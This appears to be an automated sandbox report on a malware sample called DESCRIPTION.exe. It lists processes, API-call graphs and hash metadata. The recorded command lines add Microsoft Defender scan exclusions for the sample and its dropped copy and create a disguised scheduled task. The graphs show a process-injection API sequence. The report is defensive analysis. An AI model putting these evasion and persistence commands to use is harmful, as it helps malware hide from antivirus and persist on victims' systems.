                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe"
                                                              Imagebase:0x230000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:07:21:19
                                                              Start date:15/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:07:21:19
                                                              Start date:15/01/2025
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
                                                              Imagebase:0x230000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:07:21:19
                                                              Start date:15/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:07:21:19
                                                              Start date:15/01/2025
                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp"
                                                              Imagebase:0x210000
                                                              File size:187'904 bytes
                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:07:21:19
                                                              Start date:15/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:07:21:19
                                                              Start date:15/01/2025
                                                              Path:C:\Users\user\Desktop\DESCRIPTION.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\DESCRIPTION.exe"
                                                              Imagebase:0x990000
                                                              File size:1'030'144 bytes
                                                              MD5 hash:93671481EC5215BB84AFDE48AD2280F1
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:10
                                                              Start time:07:21:21
                                                              Start date:15/01/2025
                                                              Path:C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe
                                                              Imagebase:0x6e0000
                                                              File size:1'030'144 bytes
                                                              MD5 hash:93671481EC5215BB84AFDE48AD2280F1
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 34%, ReversingLabs
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:12
                                                              Start time:07:21:24
                                                              Start date:15/01/2025
                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp"
                                                              Imagebase:0x210000
                                                              File size:187'904 bytes
                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:07:21:24
                                                              Start date:15/01/2025
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:14
                                                              Start time:07:21:24
                                                              Start date:15/01/2025
                                                              Path:C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
                                                              Imagebase:0x50000
                                                              File size:1'030'144 bytes
                                                              MD5 hash:93671481EC5215BB84AFDE48AD2280F1
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:15
                                                              Start time:07:21:24
                                                              Start date:15/01/2025
                                                              Path:C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
                                                              Imagebase:0x120000
                                                              File size:1'030'144 bytes
                                                              MD5 hash:93671481EC5215BB84AFDE48AD2280F1
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:16
                                                              Start time:07:21:24
                                                              Start date:15/01/2025
                                                              Path:C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
                                                              Imagebase:0xb60000
                                                              File size:1'030'144 bytes
                                                              MD5 hash:93671481EC5215BB84AFDE48AD2280F1
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              General

                                                              Target ID:17
                                                              Start time:07:21:25
                                                              Start date:15/01/2025
                                                              Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                              Imagebase:0xb00000
                                                              File size:418'304 bytes
                                                              MD5 hash:64ACA4F48771A5BA50CD50F2410632AD
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Has exited:false

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:8.3%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:54
                                                                Total number of Limit Nodes:2
                                                                execution_graph 44021 699f5e8 44022 699f671 CreateProcessA 44021->44022 44024 699f833 44022->44024 44009 9fb7d8 44012 9fb8c2 44009->44012 44010 9fb7e7 44013 9fb8e1 44012->44013 44014 9fb904 44012->44014 44013->44014 44015 9fbb08 GetModuleHandleW 44013->44015 44014->44010 44016 9fbb35 44015->44016 44016->44010 44025 9f4668 44026 9f467a 44025->44026 44027 9f4686 44026->44027 44029 9f4779 44026->44029 44030 9f479d 44029->44030 44034 9f4888 44030->44034 44038 9f4877 44030->44038 44036 9f48af 44034->44036 44035 9f498c 44035->44035 44036->44035 44043 9f454c 44036->44043 44039 9f47a7 44038->44039 44041 9f4887 44038->44041 44039->44027 44040 9f498c 44041->44040 44042 9f454c CreateActCtxA 44041->44042 44042->44040 44044 9f5d18 CreateActCtxA 44043->44044 44046 9f5ddb 44044->44046 44046->44046 44001 699f2a0 44002 699f2e0 VirtualAllocEx 44001->44002 44004 699f31d 44002->44004 44005 6993b20 44006 6993b6e DrawTextExW 44005->44006 44008 6993bc6 44006->44008 44017 699f450 44018 699f49b ReadProcessMemory 44017->44018 44020 699f4df 44018->44020 44047 699f360 44048 699f3a8 WriteProcessMemory 44047->44048 44050 699f3ff 44048->44050 43993 69cf980 43994 69cf9c0 ResumeThread 43993->43994 43996 69cf9f1 43994->43996 43997 69cfa30 43998 69cfa75 Wow64SetThreadContext 43997->43998 44000 69cfabd 43998->44000 44051 9fdb60 44052 9fdba6 44051->44052 44056 9fdd2f 44052->44056 44059 9fdd40 44052->44059 44053 9fdc93 44062 9fd678 44056->44062 44060 9fdd6e 44059->44060 44061 9fd678 DuplicateHandle 44059->44061 44060->44053 44061->44060 44063 9fdda8 DuplicateHandle 44062->44063 44064 9fdd6e 44063->44064 44064->44053

                                                                Executed Functions

                                                                Function 069C5AB0 Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ?w=>
                                                                • API String ID: 0-1933253675
                                                                • Opcode ID: 9a705df49fe7dfbca7faa06d408f42f96241a259c4a5808bdb3d6a0c5092bfce
                                                                • Instruction ID: 901564a31dfb22bb3bc783f9884e36bc93ce3cdf7c04ea6d35eb934dcf8ea82e
                                                                • Opcode Fuzzy Hash: 9a705df49fe7dfbca7faa06d408f42f96241a259c4a5808bdb3d6a0c5092bfce
                                                                • Instruction Fuzzy Hash: CDB100B0E05219DFEB58CFE6D88059EFBB2FF88210F10952AD415BB224DB34A912CF51
                                                                Function 069C3758 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 5{
                                                                • API String ID: 0-2291050889
                                                                • Opcode ID: 9916672ae1369d84f6d9a4f3fefbe194ebd60dc46abea31cda7813410fb08af4
                                                                • Instruction ID: e556f54e2598519f3c8ff6145713f1169a3ecd381f553dfa9a0e2409e288f4ff
                                                                • Opcode Fuzzy Hash: 9916672ae1369d84f6d9a4f3fefbe194ebd60dc46abea31cda7813410fb08af4
                                                                • Instruction Fuzzy Hash: 2EB14874E05209DFCB44DFA9D5848AEBBB2FF89310F14C46AD406AB754DB35AA01CFA1
                                                                Function 069C3768 Relevance: 1.5, Strings: 1, Instructions: 246COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 5{
                                                                • API String ID: 0-2291050889
                                                                • Opcode ID: 6d14c5323d4d8ceba8d2b15b0c0d64520f12e8fb3dec1dbca137bb06238963ab
                                                                • Instruction ID: 88125f3eca6d4aaa2b74361c1c67cfa8f48931f41892f8d1770b7a58dab76d7e
                                                                • Opcode Fuzzy Hash: 6d14c5323d4d8ceba8d2b15b0c0d64520f12e8fb3dec1dbca137bb06238963ab
                                                                • Instruction Fuzzy Hash: 37A14774E05209DFCB44DFA9D5848AEBBB2FF88310F10C46AD406AB754DB35AA01CFA1
                                                                Function 069C5201 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: j4$y
                                                                • API String ID: 0-2391584009
                                                                • Opcode ID: cab49231756c43f34e632bcf0a93b975d5f417866f8eeefd355bd4355042aeb7
                                                                • Instruction ID: f4b0a3188cab1e95933f48d6a8879fef03b0c85636847b92ce5bc39bdbf07193
                                                                • Opcode Fuzzy Hash: cab49231756c43f34e632bcf0a93b975d5f417866f8eeefd355bd4355042aeb7
                                                                • Instruction Fuzzy Hash: 03912570E05209EFDF08CFA6D59099EFBB2FF89360F10942AE415AB664D734A952CF41
                                                                Function 009F7088 Relevance: .3, Instructions: 261COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b84002a2d1757cfa40794f89f747ef1d570830f1878a5c8332ec23146d2d0363
                                                                • Instruction ID: b7b159bf9e815a6ecaaef39d71ab5faa99952e8a6846a8bc516e263034a1165c
                                                                • Opcode Fuzzy Hash: b84002a2d1757cfa40794f89f747ef1d570830f1878a5c8332ec23146d2d0363
                                                                • Instruction Fuzzy Hash: B3C1B274E002098FDB05DFA9D895BAEBBF2FF88300F1481A9E508AB365DB306941CF50
                                                                Function 0699DCEA Relevance: .3, Instructions: 259COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4ef31ac37c9fa1e24f7fafca17e60e0fc2355bad9fe984af3078268c1e34ef0b
                                                                • Instruction ID: c3c2dc599f1dcb64c4933021ca2ff09f20e0017f22d864285490563b8552701e
                                                                • Opcode Fuzzy Hash: 4ef31ac37c9fa1e24f7fafca17e60e0fc2355bad9fe984af3078268c1e34ef0b
                                                                • Instruction Fuzzy Hash: 6AA149B5E016199FDB48CFE9C980AEEFBB6FF89300F10852AE515AB754D7305909CB60
                                                                Function 009F4204 Relevance: .3, Instructions: 259COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 564c06dcce35268ba70c8479af67ec70d12a4ac7d75ec81fbdffebc7652967ae
                                                                • Instruction ID: 282fff506c9bbf8d8610754c24bbb95b0cf49d71b4bde68cc39dae1c32fded21
                                                                • Opcode Fuzzy Hash: 564c06dcce35268ba70c8479af67ec70d12a4ac7d75ec81fbdffebc7652967ae
                                                                • Instruction Fuzzy Hash: 24C1A274E002198FDB14DFA9D895BAEBBF2FF88300F1481A9E518AB365DB316945CF50
                                                                Function 0699DD78 Relevance: .2, Instructions: 189COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 58f8fae7e8ecaa6da6e9c8ac64a77f99859dee8168cfec07d550eed6b3921ff2
                                                                • Instruction ID: 79f07066e368f45d1ad8fd2d835f7609d3a895398a727e0344defb0281e7c859
                                                                • Opcode Fuzzy Hash: 58f8fae7e8ecaa6da6e9c8ac64a77f99859dee8168cfec07d550eed6b3921ff2
                                                                • Instruction Fuzzy Hash: 8981B2B4E006199FDF48CFE9C984AAEFBB2FF89300F14852AE919AB754D7345905CB50
                                                                Function 069C3B98 Relevance: .2, Instructions: 155COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1a9eb9399da4ab43a5c2d48f4b18d688a8d06f6694beb445e45bc7265a9cbfa7
                                                                • Instruction ID: 567a1fee0db3994166b69a46b33efd96bf3a3b571156869da9da3e332f89b20e
                                                                • Opcode Fuzzy Hash: 1a9eb9399da4ab43a5c2d48f4b18d688a8d06f6694beb445e45bc7265a9cbfa7
                                                                • Instruction Fuzzy Hash: 7B511A74E04219DFDB48CFA5D9455AEFBB2FF89210F10D82AD416E7264D7389A01CFA1
                                                                Function 009F4659 Relevance: .1, Instructions: 126COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1499606658.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 009F0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_9f0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50d0415762db24cac66f41e5e6e2b4c5d6b53bf739090c168143981d8d5df87a
                                                                • Instruction ID: 038163bd0906b450d24f6f2ecf11ea615760eb2e017d4a0e7fc47304a2b63569
                                                                • Opcode Fuzzy Hash: 50d0415762db24cac66f41e5e6e2b4c5d6b53bf739090c168143981d8d5df87a
                                                                • Instruction Fuzzy Hash: 71412C43544FDB8BEB1683754C5AA87BFB09BA3274B4443D9D2B8093F3D6849487D346
                                                                Function 069C0040 Relevance: .1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519914929.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_69c0000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 70c91dbacc76bba608e93b5d5def9329e6e652d060d9c6e44d161368f5446467
                                                                • Instruction ID: d8c3a28e17355d5b6d04c99123bf1d55e9c595592b6524919f9a7491ab18cb63
                                                                • Opcode Fuzzy Hash: 70c91dbacc76bba608e93b5d5def9329e6e652d060d9c6e44d161368f5446467
                                                                • Instruction Fuzzy Hash: 0E3102B1E01218CFDB58CFAAC94469EBBB7AFC8310F14C0AAD409A7264DB355A81CF50
                                                                Function 0699D238 Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fd1e4c770796a0dcd31a7b86e262ac95679c9b14bc1fa7f391ca3def820ecc1b
                                                                • Instruction ID: 9a7518bd53d6134cbcedb707f4d42c4d607a4459673eb01b11ced705e7afaf85
                                                                • Opcode Fuzzy Hash: fd1e4c770796a0dcd31a7b86e262ac95679c9b14bc1fa7f391ca3def820ecc1b
                                                                • Instruction Fuzzy Hash: FA21C971E056189BEB58CFABD84079EFBF7AFC9200F04C1AAD408A7214DB341A468F61
                                                                Function 04B7C168 Relevance: 2.0, Strings: 1, Instructions: 752COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: sgJn^
                                                                • API String ID: 0-1570287663
                                                                • Opcode ID: 596b199d14788760a9da6172882b1e5a27f9b6793fc4c3868e2898238bac2d71
                                                                • Instruction ID: 2f40482193e922ec715606ac098e27ea5f69bedf6513395d8ba16a388ffb88de
                                                                • Opcode Fuzzy Hash: 596b199d14788760a9da6172882b1e5a27f9b6793fc4c3868e2898238bac2d71
                                                                • Instruction Fuzzy Hash: E462D9B0D00B41CAEB74DF7495983AE7EA6EB41B44F10899ED0BBDF291DB34B4818B51
                                                                Function 0699F5DC Relevance: 1.8, APIs: 1, Instructions: 251processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 291 699f5dc-699f67d 294 699f67f-699f689 291->294 295 699f6b6-699f6d6 291->295 294->295 296 699f68b-699f68d 294->296 302 699f6d8-699f6e2 295->302 303 699f70f-699f73e 295->303 297 699f68f-699f699 296->297 298 699f6b0-699f6b3 296->298 300 699f69b 297->300 301 699f69d-699f6ac 297->301 298->295 300->301 301->301 304 699f6ae 301->304 302->303 305 699f6e4-699f6e6 302->305 309 699f740-699f74a 303->309 310 699f777-699f831 CreateProcessA 303->310 304->298 307 699f709-699f70c 305->307 308 699f6e8-699f6f2 305->308 307->303 311 699f6f4 308->311 312 699f6f6-699f705 308->312 309->310 314 699f74c-699f74e 309->314 323 699f83a-699f8c0 310->323 324 699f833-699f839 310->324 311->312 312->312 313 699f707 312->313 313->307 315 699f771-699f774 314->315 316 699f750-699f75a 314->316 315->310 318 699f75c 316->318 319 699f75e-699f76d 316->319 318->319 319->319 321 699f76f 319->321 321->315 334 699f8d0-699f8d4 323->334 335 699f8c2-699f8c6 323->335 324->323 337 699f8e4-699f8e8 334->337 338 699f8d6-699f8da 334->338 335->334 336 699f8c8 335->336 336->334 340 699f8f8-699f8fc 337->340 341 699f8ea-699f8ee 337->341 338->337 339 699f8dc 338->339 339->337 343 699f90e-699f915 340->343 344 699f8fe-699f904 340->344 341->340 342 699f8f0 341->342 342->340 345 699f92c 343->345 346 699f917-699f926 343->346 344->343 348 699f92d 345->348 346->345 348->348
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0699F81E
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 4a588af7b59db9325bddf566206cf664a4d684f088eb81825c0269ed3e19acc7
                                                                • Instruction ID: a31dc8fd9d2112bd41eb8a0981a3fe1916c5a23082c03d23c0a6c4b69c87766c
                                                                • Opcode Fuzzy Hash: 4a588af7b59db9325bddf566206cf664a4d684f088eb81825c0269ed3e19acc7
                                                                • Instruction Fuzzy Hash: 47A18971D0031A8FEF64DF69C8417EEBBB6AF44310F1485A9E809E7250DB749981CFA1
                                                                Function 0699F5E8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 349 699f5e8-699f67d 351 699f67f-699f689 349->351 352 699f6b6-699f6d6 349->352 351->352 353 699f68b-699f68d 351->353 359 699f6d8-699f6e2 352->359 360 699f70f-699f73e 352->360 354 699f68f-699f699 353->354 355 699f6b0-699f6b3 353->355 357 699f69b 354->357 358 699f69d-699f6ac 354->358 355->352 357->358 358->358 361 699f6ae 358->361 359->360 362 699f6e4-699f6e6 359->362 366 699f740-699f74a 360->366 367 699f777-699f831 CreateProcessA 360->367 361->355 364 699f709-699f70c 362->364 365 699f6e8-699f6f2 362->365 364->360 368 699f6f4 365->368 369 699f6f6-699f705 365->369 366->367 371 699f74c-699f74e 366->371 380 699f83a-699f8c0 367->380 381 699f833-699f839 367->381 368->369 369->369 370 699f707 369->370 370->364 372 699f771-699f774 371->372 373 699f750-699f75a 371->373 372->367 375 699f75c 373->375 376 699f75e-699f76d 373->376 375->376 376->376 378 699f76f 376->378 378->372 391 699f8d0-699f8d4 380->391 392 699f8c2-699f8c6 380->392 381->380 394 699f8e4-699f8e8 391->394 395 699f8d6-699f8da 391->395 392->391 393 699f8c8 392->393 393->391 397 699f8f8-699f8fc 394->397 398 699f8ea-699f8ee 394->398 395->394 396 699f8dc 395->396 396->394 400 699f90e-699f915 397->400 401 699f8fe-699f904 397->401 398->397 399 699f8f0 398->399 399->397 402 699f92c 400->402 403 699f917-699f926 400->403 401->400 405 699f92d 402->405 403->402 405->405
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0699F81E
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1519169052.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_6990000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: f5f4e1e5b43a7fd8e16f0804b8371b12dbe177283e3f29cab67a094de5734d34
                                                                • Instruction ID: 5e07667e02dd571b996502fea0c51e3817597afbb69e6fc81d21f5d0f36ce8b3
                                                                • Opcode Fuzzy Hash: f5f4e1e5b43a7fd8e16f0804b8371b12dbe177283e3f29cab67a094de5734d34
                                                                • Instruction Fuzzy Hash: AE916971D003198FEF54DF69C8407EEBBB6AF44310F1485A9D809E7250DB749985CFA1
                                                                Function 04B7C108 Relevance: 1.7, Strings: 1, Instructions: 485COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.1515824403.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_4b70000_DESCRIPTION.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: sgJn^
                                                                • API String ID: 0-1570287663
                                                                • Opcode ID: 35f29325925c05008b3b9ec5e0a50995adad2987f1c5fac902e6027145362d7b
                                                                • Instruction ID: de26e940e6d7c31a2f8a16e153abe3b64eaffa824651bd6c582ffe0498bfaafc
                                                                • Opcode Fuzzy Hash: 35f29325925c05008b3b9ec5e0a50995adad2987f1c5fac902e6027145362d7b
                                                                • Instruction Fuzzy Hash: E0224CB0905B82CADB74DF7486C429DBEA0EB05B50F20899FC1FB9F255D735A086CB85
                                                                Function 009FB8C2 Relevance: 1.7, APIs: 1, Instructions: 208COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
